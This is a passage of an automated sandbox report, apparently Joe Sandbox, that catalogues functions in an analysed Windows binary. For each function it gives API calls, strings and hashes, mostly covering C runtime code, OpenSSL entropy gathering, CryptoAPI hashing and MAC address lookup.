                    • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                    Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                    APIs
                    • ___crtCorExitProcess.LIBCMT ref: 00427B11
                      • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                      • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                    • ExitProcess.KERNEL32 ref: 00427B1A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                    • String ID: i;B
                    • API String ID: 2427264223-472376889
                    • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                    • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                    • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                    • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                    Function 0040EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1063 40ef50-40ef7a call 420c62 1066 40efdc-40efe2 1063->1066 1067 40ef7c 1063->1067 1068 40ef80-40ef85 call 420c62 1067->1068 1070 40ef8a-40efbd call 42b420 1068->1070 1073 40efc0-40efcf 1070->1073 1073->1073 1074 40efd1-40efda 1073->1074 1074->1066 1074->1068
                    APIs
                    • _malloc.LIBCMT ref: 0040EF69
                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00770000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                    • _malloc.LIBCMT ref: 0040EF85
                    • _memset.LIBCMT ref: 0040EF9B
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$AllocateHeap_memset
                    • String ID:
                    • API String ID: 3655941445-0
                    • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                    • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                    • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                    • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                    Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1075 42fb64-42fb77 call 428520 1078 42fba5-42fbaa call 428565 1075->1078 1079 42fb79-42fb8c call 428af7 1075->1079 1084 42fb99-42fba0 call 42fbab 1079->1084 1085 42fb8e call 42fe47 1079->1085 1084->1078 1088 42fb93 1085->1088 1088->1084
                    APIs
                    • __lock.LIBCMT ref: 0042FB7B
                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                      • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                    • __tzset_nolock.LIBCMT ref: 0042FB8E
                      • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                      • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                      • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                      • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                      • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                      • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                    • String ID:
                    • API String ID: 1282695788-0
                    • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                    • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                    • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                    • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                    Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1089 427f3d-427f47 call 427e0e 1091 427f4c-427f50 1089->1091
                    APIs
                    • _doexit.LIBCMT ref: 00427F47
                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Pointer$Decode$Encode$__lock_doexit
                    • String ID:
                    • API String ID: 2158581194-0
                    • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                    • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                    • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                    • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

                    Non-executed Functions

                    Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExA.KERNEL32(00000094), ref: 00481983
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                    • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                    • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                    • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                    • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                    • FreeLibrary.KERNEL32(?), ref: 00481AC5
                    • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                    • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                    • FreeLibrary.KERNEL32(?), ref: 00481C15
                    • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                    • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                    • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                    • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                    • FreeLibrary.KERNEL32(?), ref: 00481D45
                    • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                    • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                    • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                    • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                    • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                    • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                    • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                    • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                    • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                    • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                    • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                    • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                    • GetTickCount.KERNEL32 ref: 00481F03
                    • GetTickCount.KERNEL32 ref: 00481FF1
                    • GetTickCount.KERNEL32 ref: 00482066
                    • GetTickCount.KERNEL32 ref: 00482095
                    • GetTickCount.KERNEL32 ref: 004820FB
                    • GetTickCount.KERNEL32 ref: 00482118
                    • GetTickCount.KERNEL32 ref: 00482187
                    • GetTickCount.KERNEL32 ref: 004821A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountTick$Library$Load$Free$Version
                    • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                    • API String ID: 842291066-1723836103
                    • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                    • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                    • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                    • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                    Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                    Download Yara Rule
                    APIs
                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                    • __CxxThrowException@8.LIBCMT ref: 00411026
                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                    • __CxxThrowException@8.LIBCMT ref: 00411051
                    • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                    • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                    • __CxxThrowException@8.LIBCMT ref: 0041107A
                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                    • __CxxThrowException@8.LIBCMT ref: 004110AB
                    • _memset.LIBCMT ref: 004110CA
                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                    • __CxxThrowException@8.LIBCMT ref: 004110F0
                    • _malloc.LIBCMT ref: 00411100
                    • _memset.LIBCMT ref: 0041110B
                    • _sprintf.LIBCMT ref: 0041112E
                    • lstrcatA.KERNEL32(?,?), ref: 0041113C
                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                    • String ID: %.2X
                    • API String ID: 2451520719-213608013
                    • Opcode ID: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                    • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                    • Opcode Fuzzy Hash: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                    • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                    Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32 ref: 00411915
                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                    • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                    • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                    • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                    • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                    • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                    • _memset.LIBCMT ref: 004119B8
                    • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                      • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                    • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                    • String ID: failed with error
                    • API String ID: 4182478520-946485432
                    • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                    • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                    • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                    • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                    Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                    • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                    • __CxxThrowException@8.LIBCMT ref: 0040E90F
                    • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                    • __CxxThrowException@8.LIBCMT ref: 0040E93E
                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                    • __CxxThrowException@8.LIBCMT ref: 0040E96F
                    • _memset.LIBCMT ref: 0040E98E
                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                    • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                    • _sprintf.LIBCMT ref: 0040E9D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                    • String ID: %.2X
                    • API String ID: 1084002244-213608013
                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                    Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                    • __CxxThrowException@8.LIBCMT ref: 0040EB17
                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                    • __CxxThrowException@8.LIBCMT ref: 0040EB42
                    • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                    • __CxxThrowException@8.LIBCMT ref: 0040EB64
                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                    • __CxxThrowException@8.LIBCMT ref: 0040EB95
                    • _memset.LIBCMT ref: 0040EBB4
                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                    • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                    • _sprintf.LIBCMT ref: 0040EBF4
                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                    • String ID: %.2X
                    • API String ID: 1637485200-213608013
                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                    Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                      • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                      • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                      • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                      • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                      • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                      • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                      • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                    • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                    • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                    • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                    • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                    • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                    • SelectObject.GDI32(?,?), ref: 00482436
                    • DeleteObject.GDI32(00000000), ref: 0048243D
                    • DeleteDC.GDI32(?), ref: 0048244A
                    • DeleteDC.GDI32(?), ref: 00482450
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                    • String ID: .\crypto\rand\rand_win.c$DISPLAY
                    • API String ID: 151064509-1805842116
                    • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                    • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                    • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                    • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                    Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    • _malloc.LIBCMT ref: 0040E67F
                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00770000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                    • _malloc.LIBCMT ref: 0040E68B
                    • _wprintf.LIBCMT ref: 0040E69E
                    • _free.LIBCMT ref: 0040E6A4
                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                    • _free.LIBCMT ref: 0040E6C5
                    • _malloc.LIBCMT ref: 0040E6CD
                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                    • _sprintf.LIBCMT ref: 0040E720
                    • _wprintf.LIBCMT ref: 0040E732
                    • _wprintf.LIBCMT ref: 0040E73C
                    • _free.LIBCMT ref: 0040E745
                    Strings
                    • Address: %s, mac: %s, xrefs: 0040E72D
                    • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                    • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                    • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                    • API String ID: 3901070236-1604013687
                    • Opcode ID: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                    • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                    • Opcode Fuzzy Hash: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
